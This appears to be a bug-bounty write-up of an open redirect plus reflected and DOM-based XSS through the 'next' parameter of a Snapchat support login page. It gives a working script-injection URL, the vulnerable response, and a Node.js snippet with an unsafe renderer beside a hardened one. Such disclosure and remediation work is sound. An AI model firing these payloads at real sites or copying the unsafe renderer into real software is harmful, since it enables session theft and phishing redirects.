XSS and Open Redirect at Snapchat

Credit to @revskills for publishing this.

When you first open the link, the server responds with a Location header pointing to the URL in the GET parameter named “next” (open redirect).
The second time this does not happen; presumably it is a cookie-based control.

Burp screenshot: (image not reproduced)

The GET parameter “next” is also reflected several times in the page without any encoding.

https://support.snapchat.com/login?next="><script>alert(1)</script>

Now check line 63 of the response and you will find this: <input type="hidden" name="next" value=""><script>alert(1)</script>">

Then there is this script:

<script type="text/javascript">
skipLogin=('&skip_login=true')
document.write(
'<div class="login-p"><a class="skip-sign-in dark-gray-text" href="/login?next="[payload]' + skipLogin + '">Skip Sign In</a></div>'
)
</script>

Anything except a ; can be inserted there.
The easiest payload is this:

Payload: "><script>alert(1)</script>
Request: https://support.snapchat.com/login?next="><script>alert(1)</script>

Response:

<script type="text/javascript">
skipLogin=('&skip_login=true')
document.write(
'<div class="login-p"><a class="skip-sign-in dark-gray-text" href="/login?next="><script>alert(1)</script>' + skipLogin + '">Skip Sign In</a></div>'
)
</script>

What really happens here is that the script writes the payload into the document and the browser then executes it, so it is effectively a DOM-based XSS (although a normal reflected XSS is probably possible too if you try).

So, basically, the very same page has a DOM-based XSS, an open redirect and a reflected XSS.
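As an added example (not Snapchat's code, and not from the original writeup), the following Node.js snippet models the “next” handling described above: the unsafe rendering that reflects the parameter into an attribute and into a document.write() string, beside a hardened version that validates the redirect target and encodes the value for each context. All function names and the page fragment are assumptions.

```javascript
// Encode for an HTML attribute or text context.
function htmlEscape(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Encode for embedding inside a JavaScript string literal. JSON.stringify
// quotes and escapes the value; the extra replace stops "</script>" from
// closing the surrounding script block, which attribute encoding alone
// would not prevent.
function jsStringLiteral(s) {
  return JSON.stringify(String(s)).replace(/<\//g, '<\\/');
}

// Only allow a same-origin relative path as the post-login destination.
// Rejects absolute URLs, protocol-relative "//host", backslash variants
// and embedded line breaks (the open-redirect half of the bug).
function safeNext(next, fallback = '/') {
  if (typeof next !== 'string') return fallback;
  if (!/^\/(?![\/\\])[^\r\n]*$/.test(next)) return fallback;
  return next;
}

// Unsafe rendering, as on the page: the value is spliced verbatim into a
// hidden input and into the document.write() string. Kept to show the bug.
function renderLoginUnsafe(next) {
  return `<input type="hidden" name="next" value="${next}">` +
    `<script>document.write('<a href="/login?next=${next}&skip_login=true">Skip Sign In</a>')</script>`;
}

// Hardened rendering: the target is validated, HTML-encoded in the
// attribute, and handed to the script as a proper string literal that is
// assigned to a DOM property instead of being written as markup.
function renderLoginSafe(next) {
  const target = safeNext(next);
  const href = '/login?next=' + encodeURIComponent(target) + '&skip_login=true';
  return `<input type="hidden" name="next" value="${htmlEscape(target)}">` +
    `<script>var skipHref=${jsStringLiteral(href)};` +
    `var a=document.createElement('a');a.href=skipHref;a.textContent='Skip Sign In';` +
    `document.currentScript.parentNode.appendChild(a);</script>`;
}

module.exports = { htmlEscape, jsStringLiteral, safeNext, renderLoginUnsafe, renderLoginSafe };
```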